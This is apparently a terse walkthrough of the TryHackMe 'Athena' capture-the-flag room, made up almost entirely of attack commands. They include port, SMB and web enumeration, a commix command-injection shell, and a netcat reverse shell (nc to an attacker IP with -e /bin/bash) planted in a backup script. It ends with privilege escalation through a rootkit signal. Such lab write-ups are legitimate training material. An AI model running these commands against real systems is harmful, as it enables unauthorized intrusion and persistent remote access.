Athena
Room Link: https://tryhackme.com/r/room/4th3n4
Scans
Initial scan
Kali
nmap -A $VICTIM
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/139 - NetBIOS
Kali
nbtscan $VICTIM
Kali
enum4linux $VICTIM
TCP/445 - SMB
Kali
smbclient \\\\$VICTIM\\public
prompt
mget *
TCP/80 - HTTP
Find Pages
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt


Initial Shell
Shell #1

Kali
git clone https://github.com/commixproject/commix.git commix
cd commix/
python commix.py -r ../request.txt 
Shell #2
Kali
nc -lvnp 1337

Full TTY
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fgLateral Movement
LinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 82Victim
cd /tmp/
wget http://$KALI:82/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Kali
nc -lvnp 1338Victim
echo '#!/bin/bash' > /usr/share/backup/backup.sh
echo "/usr/bin/nc 10.10.35.7 1338 -e /bin/bash" >> /usr/share/backup/backup.sh
Full TTY
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fgPrivilege Escalation
Victim(athena)
sudo -l
Victim(athena)
cd /mnt/.../secret/
modinfo venom.ko
Victim(athena)
kill -57 271
id
Last updated